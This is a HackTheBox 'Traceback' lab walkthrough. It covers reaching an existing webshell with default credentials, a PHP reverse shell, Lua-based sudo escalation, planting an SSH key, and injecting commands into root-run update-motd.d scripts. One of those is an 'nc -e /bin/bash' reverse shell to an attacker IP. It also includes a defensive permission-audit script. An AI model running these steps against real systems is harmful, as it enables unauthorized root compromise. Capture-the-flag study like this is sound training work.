2020-03-24

HTB::Traceback Walkthrough

0x01 Info Card

0x02 Tools and Tips

  • nmap
  • pspy
  • gtfobins
  • OSINT
  • SSH with public key

0x03 Pentesting

Initial Enumeration

nmap scan

# Nmap 7.80 scan initiated Mon Mar 23 10:20:21 2020 as: nmap -sC -sV -oN ippsec_scan.txt 10.10.10.181
Nmap scan report for 10.10.10.181
Host is up (0.37s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 23 10:21:10 2020 -- 1 IP address (1 host up) scanned in 49.24 seconds

Meanwhile, I ran gobuster and dirb, but there was nothing interesting for me.

Getting User Access

80 HTTP Website

Hint: Some of the best web shells that you might need ;), Google it

Found a Github repo

Test every webshell filename from the repo as a URL on the target.

The smevk.php webshell works, and the username is admin, password is admin.

Upload a PHP reverse shell script through the Code Injector module.

Now I can get a PHP reverse shell:

$ nc -lvvp 4444
listening on [any] 4444 ...
10.10.10.181: inverse host lookup failed: Unknown host
connect to [10.10.16.99] from (UNKNOWN) [10.10.10.181] 33430
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
$ cd /home/webadmin
$ ls -la
total 44
drwxr-x--- 5 webadmin sysadmin 4096 Mar 16 04:03 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 webadmin webadmin 105 Mar 16 04:03 .bash_history
-rw-r--r-- 1 webadmin webadmin 220 Aug 23 2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23 2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23 2019 .cache
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24 2019 .local
-rw-rw-r-- 1 webadmin webadmin 1 Aug 25 2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin 807 Aug 23 2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Feb 27 06:29 .ssh
-rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16 03:53 note.txt

In webadmin's home directory, two files are worth looking at: note.txt and .bash_history.

$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
$ cat .bash_history
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
rm privesc.lua
logout

The idea should be to use the /home/sysadmin/luvit tool to run a Lua script: create a new privesc.lua script and then execute the same commands as in .bash_history.

$ echo 'os.execute("/bin/sh")' > privesc.lua
$ cat privesc.lua
os.execute("/bin/sh")
$ sudo -u sysadmin /home/sysadmin/luvit privesc.lua
sh: turning off NDELAY mode

$ id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
$ cd /home/sysadmin
$ ls
luvit
user.txt

Get user flag~

Getting Root Access

After reading some hints given by other players on the HTB Forum, I used the pspy tool to monitor the processes running on the system and found something interesting:

2020/03/23 21:11:01 CMD: UID=0 PID=2273 | sleep 30
2020/03/23 21:11:01 CMD: UID=0 PID=2272 | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
2020/03/23 21:11:01 CMD: UID=0 PID=2271 |
2020/03/23 21:11:01 CMD: UID=0 PID=2270 | /usr/sbin/CRON -f
2020/03/23 21:11:01 CMD: UID=0 PID=2269 | /usr/sbin/CRON -f
2020/03/23 21:11:31 CMD: UID=0 PID=2275 | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/
2020/03/23 21:12:02 CMD: UID=0 PID=2281 | sleep 30
2020/03/23 21:12:02 CMD: UID=0 PID=2278 | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
2020/03/23 21:12:02 CMD: UID=0 PID=2277 |
2020/03/23 21:12:02 CMD: UID=0 PID=2276 | /usr/sbin/CRON -f
2020/03/23 21:12:32 CMD: UID=0 PID=2282 | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/

As the output shows, every 30 seconds the system copies the files in /var/backups/.update-motd.d/ into /etc/update-motd.d/. A quick search for update-motd.d shows that after every successful SSH login the commands in the 00-header file are executed. The remaining question is how to log in to the target over SSH. I spent a long time looking for an SSH password before it suddenly occurred to me that, besides password login, SSH also supports public-key login: simply append the public key from my own machine to /home/webadmin/.ssh/authorized_keys on the target.
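The root cause on this box is that the scripts in /etc/update-motd.d run as root on every login, so any of them that a low-privilege user can modify is a root code-execution path. The following audit script is an added example (not from the original post): it flags MOTD scripts that are not root-owned, are group- or world-writable, or are symlinks, and its demo() builds a constructed directory in a temp folder using the file names seen in the pspy output above; because those demo files are owned by the current user, it passes that uid as the expected owner.

```python
import os
import stat
import tempfile

# Directory whose scripts pam_motd executes as root at every SSH login.
MOTD_DIR = "/etc/update-motd.d"


def audit_motd_scripts(motd_dir=MOTD_DIR, root_uid=0):
    """Return a list of (filename, problem) for entries in motd_dir that a
    non-root user could control. Each finding is a potential root RCE path,
    because the scripts run with root privileges at login."""
    findings = []
    for name in sorted(os.listdir(motd_dir)):
        path = os.path.join(motd_dir, name)
        st = os.lstat(path)
        if stat.S_ISLNK(st.st_mode):
            findings.append((name, "symlink (target may be user-controlled)"))
            continue
        if not stat.S_ISREG(st.st_mode):
            continue
        if st.st_uid != root_uid:
            findings.append((name, f"owned by uid {st.st_uid}, not root"))
        if st.st_mode & stat.S_IWGRP:
            findings.append((name, "group-writable"))
        if st.st_mode & stat.S_IWOTH:
            findings.append((name, "world-writable"))
    # A writable directory lets a user replace scripts even if each file is 0644.
    dst = os.stat(motd_dir)
    if dst.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append((".", "directory writable by group/others"))
    return findings


def demo():
    """Constructed example: a fake update-motd.d with one safe and two weak scripts."""
    d = tempfile.mkdtemp()
    for name, mode in (("00-header", 0o755),
                       ("10-help-text", 0o775),
                       ("91-release-upgrade", 0o777)):
        with open(os.path.join(d, name), "w") as f:
            f.write("#!/bin/sh\necho motd\n")
        os.chmod(os.path.join(d, name), mode)
    os.chmod(d, 0o755)
    # The demo files belong to the current user, so treat that uid as the expected owner.
    return audit_motd_scripts(d, root_uid=os.getuid())


if __name__ == "__main__":
    for name, problem in demo():
        print(f"{name}: {problem}")
```

Run it as root against the real directory with audit_motd_scripts() to check a host; an empty list means every script and the directory are root-owned and writable only by root.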

While at it, a refresher on how SSH works: https://www.jianshu.com/p/33461b619d53

On the target machine:

$ echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC6zGx1XQHjBj5x5D+qqE+0wml2VnALfbz7D5CpexgNrpEDQTOWCEkIAl1Ftt9FNClzdNk+/NFMWXR8dxRHzOl7aQzMa+njQOzh6VyM34YbCGuGgakDCIrsHu25dAwypvJ7Clp22faDDIw6zJxcx84Ir1XSpUeWZ4Cotk+0gVzwgLHbstRPxyzxROvcsesx9kd251L3/bWJzC53oNDaSXzMBYV7sdjSlPLeD9zHJ39wr5YaEFwn0vkgPR+VAdlXAOLi98Ttr+FYMsGr8XMbJU06QKZ2ozf6RVjc6RJ5hjgIFbcxV8VCNGM6rBx5FDCZDgnbzu4ITWpWsgBBLu3JndjD+UWkeejLE4K7eR3510W/x4zHF/0TsZicyh/ZJbZEo+JefvVKT0WAilaJ2K7w7jDkrPhZO6TheGTDnvLqrEvHObGq70ytpZ6ippsm78/xkwCHu4l03RMd2Zt+7elXOsA/4WsjEvS+CxqlbtTC636+T6T4cTro2GHlO3lAq7oddq0= [email protected] >> /home/webadmin/.ssh/authorized_keys

$ cd /etc/update-motd.d/
$ echo "cat /root/root.txt" >> 00-header

On the attacking host (these two steps have to follow each other quickly, because the cron job overwrites the file every 30 seconds):

$ ssh -i id_rsa [email protected]
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land

cf6c[---------------------------]aefc

Last login: Mon Mar 16 03:50:24 2020 from 10.10.14.2

Get root flag~

Alternatively, a reverse shell can be written into 91-release-upgrade:

#!/bin/sh
/tmp/nc -e /bin/bash 10.10.14.194 2345
# if the current release is under development there won't be a new one
if [ "$(lsb_release -sd | cut -d' ' -f4)" = "(development" ]; then
    exit 0
fi
if [ -x /usr/lib/ubuntu-release-upgrader/release-upgrade-motd ]; then
    exec /usr/lib/ubuntu-release-upgrader/release-upgrade-motd
fi

0x04 Conclusion

0x05 Reference

https://www.hackingarticles.in/fowsniff-1-vulnhub-walkthrough/

https://github.com/DominicBreuker/pspy

https://gtfobins.github.io/gtfobins/lua/

Copyright © ca01h 2019-2020